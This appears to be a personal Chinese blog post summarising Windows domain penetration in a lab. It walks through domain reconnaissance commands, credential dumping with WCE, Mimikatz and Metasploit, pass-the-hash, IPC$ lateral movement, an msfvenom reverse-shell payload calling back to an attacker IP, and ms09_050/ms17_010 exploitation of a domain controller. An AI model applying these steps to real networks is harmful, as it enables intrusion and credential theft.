内网域渗透学习小结

内网域渗透学习小结

内网域渗透学习小结

 总结的思路可能有些乱 - - 当做个记录而已。

获取域中某台机器控制权后

渗透思路就是拿下域控的权限 实现对整个域的控制

 

0x01信息收集:

 

  1. ipconfig /all

    2.net view /domain                    查看有几个域

    3.net view /domain:XXX                            查看此域内电脑

    4.net group /domain       查询域里面的组

    5.net group “domain admins” /domain     查看域管理员

    6.net group “domain controllers” /domain     查看域控制器

    7.net group “enterprise admins” /domain     查看企业管理

 

 

知道了所在域和域控的ip后(一般域控和dns为同一台服务器)

 

 

明确渗透思路:

从域主机入手:抓取域主机HASH--->登录到域进行域控的shell反弹或者在域主机上进行hash注入 登录到域控伪造ticket(pass the ticket)

直接从域控入手:0day溢出漏洞(smb、rdp、rpc、dns)、各种服务弱口令爆破、hash注入读取lsa明文密码

Ps:拿到域主机或者域控可能会遇到很多安全策略端口限制

利用lcx portfwd这些工具进行端口映射、端口转发 再进行3389连接

  1. 使用WCE和MIMIKATZ(这2个工具必须要管理员的权限,而且注意工具的免杀)
    2.使用MSF的hashdump模块,一个是hashdump,只能导出本地hash,另一个是smart_hashdump(必须是管理员权限),可以导出域用户的hash
    3.使用Powershell模块直接导出

 

抓取hash工具使用笔记:

 

1) WCE

常用参数

-l  默认的参数 列出登录的会话和NTLM凭据(默认值)

 内网域渗透学习小结_第1张图片

-w  通过摘要式认证缓存一个明文的密码

 内网域渗透学习小结_第2张图片

 

-s  (hash注入 根本登录凭据 即不需破出hash的明文密码也可登录管理)格式:wce.exe -s 用户名:对方机器名或者ip:LM-HASH:NT-HASH

hash注入的原理是将我们预备好的目标机器的本地或者是域用户hash注入到本地的认证进程lsass.exe中去,使得本地在使用ipc登录目标机器的时候就如同自己登录自己的机器一样获得权限。hash注入本身是为了对付那些破解不了的NTHASH。

 

2)MIMIKATZ

第一条:privilege::debug//提升权限
第二条:sekurlsa::logonpasswords//抓取密码

 

内网域渗透学习小结_第3张图片

 

3)使用msf中的两个hash抓取模块

hashdump,只能导出本地hash,另一个是smart_hashdump(必须是管理员权限),可以导出域用户的hash

内网域渗透学习小结_第4张图片

 

4)使用Powershell模块直接导出

 

获取了受控这台域主机后 下一步渗透就是接近我们的域控目标

 

分两种情况

 

A.如果不能直接攻击域服务器,我们需要再攻击内网某个服务器,然后再攻击域服务器

B.可以直接攻击域服务器
对于情况A:

1.我们可以利用抓到的密码加上我们收集的信息编个字典,然后添加路由进行弱口令的扫描
2.使用PsExec爆破整个局域网或者反弹meterpreter
3.利用smb_login模块扫描内网
4.利用当前权限,用WIN下面的PsExec进行内网渗透
5.使用powershell对内网进行扫描(要求WIN7以上服务器)
6.架设socks4a,然后进行内网扫描
7.利用当前权限,进行内网IPC$渗透

 

 

对于情况B:

使用抓取的账号密码 登录到域控的ipc连接 添加任务 让域主机定时执行我们用VEIL生成的meterpreter(或者msfvenom)  进行shell反弹

 

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.109 lport=4444 -f exe > shell.exe

生成shell.exe服务端

内网域渗透学习小结_第5张图片

内网域渗透学习小结_第6张图片

 

受控域主机 ipc连接域控

Net use \\域控ip 密码 /user:域名\用户名

 

 

查看共享目录

 内网域渗透学习小结_第7张图片

 

 

Copy命令上传我们的shell.exe  at命令定时执行

At \\域控ip 时间 任务路径

不过默认win2008没有开启计划服务

内网域渗透学习小结_第8张图片

 

Msf监听反弹的木马

内网域渗透学习小结_第9张图片

 

域控计划执行shell.exe  

内网域渗透学习小结_第10张图片

内网域渗透学习小结_第11张图片

 

成功反弹域控shell

接着就是在域控上进行抓取hash

 

可以用Mimikatz也可以用run post/windows/gather/hashdump

 

这里我使用msf的hash抓取

内网域渗透学习小结_第12张图片

 

显示权限不够

Getsystem一下

 

再次抓取域控hash

内网域渗透学习小结_第13张图片

 

抓取成功

 

 

 

 

抓取成功后进行hash注入 注入域管理帐号 拿到域控

 

 

 

 

 

 

 

 

 

 

 

 

 

还有对域控直接攻击的方法就是远程溢出漏洞

 

 

先用nmap扫描探测常见的漏洞

 

 内网域渗透学习小结_第14张图片

 

 

 

 

发现

内网域渗透学习小结_第15张图片

 

CVE-2009-3103存在此漏洞 

 

上网查找了这个漏洞对应的ms漏洞编号

 

使用msf 利用ms09_050 进行溢出提权

内网域渗透学习小结_第16张图片

内网域渗透学习小结_第17张图片

 

拿下域控

 

 

同样 看到开放了445  通过ms17_010一样可以溢出提权

 

 内网域渗透学习小结_第18张图片

内网域渗透学习小结_第19张图片

 

 

至于弱口令爆破 没有尝试 因为域控的密码策略都是小写大小特殊符号的组合 就一般不对域控进行弱口令爆破

 内网域渗透学习小结_第20张图片

内网域渗透学习小结_第21张图片

 

内网域渗透学习小结_第22张图片

内网域渗透学习小结_第23张图片

 

posted @ 2018-12-16 21:55 卿先生 阅读(...) 评论(...) 编辑 收藏

你可能感兴趣的:(内网渗透,权限提升,Web渗透)